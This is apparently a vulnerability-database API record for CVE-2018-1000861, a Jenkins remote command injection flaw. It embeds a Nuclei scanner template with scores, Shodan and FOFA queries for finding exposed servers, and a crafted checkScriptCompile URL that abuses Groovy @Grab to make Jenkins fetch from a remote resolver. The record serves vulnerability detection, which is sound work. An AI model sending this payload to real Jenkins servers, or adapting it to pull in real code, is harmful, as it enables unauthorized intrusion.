{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2018-1000861/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2018-1000861/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2018-1000861/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2018-1000861/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2018-1000861/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2018-1000861"},"sightings":{"href":"/api/v1/sightings/cve-2018-1000861"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2018/CVE-2018-1000861.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2018-1000861\n\ninfo:\n  name: Jenkins - Remote Command Injection\n  author: dhiyaneshDK,pikpikcu\n  severity: critical\n  description: Jenkins 2.153 and earlier and LTS 2.138.3 and earlier are susceptible to a remote command injection via stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java that allows attackers to invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire Jenkins server.\n  remediation: |\n    Apply the latest security patches and updates provided by Jenkins to mitigate this vulnerability.\n  reference:\n    - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000861\n    - https://jenkins.io/security/advisory/2018-12-05/#SECURITY-595\n    - http://packetstormsecurity.com/files/166778/Jenkins-Remote-Code-Execution.html\n    - https://access.redhat.com/errata/RHBA-2019:0024\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2018-1000861\n    cwe-id: CWE-502\n    epss-score: 0.98326\n    epss-percentile: 0.99914\n    cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*\n  metadata:\n    max-request: 1\n    vendor: jenkins\n    product: jenkins\n    shodan-query:\n      - http.favicon.hash:81586312\n      - cpe:\"cpe:2.3:a:jenkins:jenkins\"\n      - product:\"jenkins\"\n    fofa-query: icon_hash=81586312\n  tags: cve2018,cve,packetstorm,kev,vulhub,rce,jenkins,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - '{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;'\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"package#vulntest\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450221009176c8f07e85c4a91bfc43637dd1e342df34370a97644cdcda7f63fd146f4a2502205053cf47fb9fc162a417bed4131f1a65011ea34a89587c5320bdce525f40e22e:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2018-1000861"}